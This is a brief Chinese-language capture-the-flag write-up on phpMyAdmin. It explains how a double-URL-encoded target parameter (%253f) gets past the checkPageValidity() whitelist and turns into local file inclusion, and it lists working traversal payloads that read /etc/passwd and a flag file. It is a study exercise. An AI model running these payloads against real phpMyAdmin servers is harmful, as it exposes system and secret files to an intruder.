知识点:phpmyadmin
扫描
什么都没有,御剑扫一下
进phpmyadmin看看
直接对着版本信息上网查版本漏洞
phpmyadmin
例如传入
?target=db_datadict.php%253f
由于服务器会自动解码一次,所以在checkPageValidity()中,$page的值一开始会是db_datadict.php%3f,又一次url解码后变成了db_datadict.php?,这次便符合了?前内容在白名单的要求,函数返回true
但在index.php中$_REQUEST[‘target’]仍然是db_datadict.php%3f,而且会被include,通过目录穿越,就可造成任意文件包含
漏洞原理是:
利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。
%25的url编码为%
%3f的url编码为?
%253f-->?
payload
?target=db_sql.php%253f/../../../../../../etc/passwd
target=db_sql.php%253f/../../../../../flag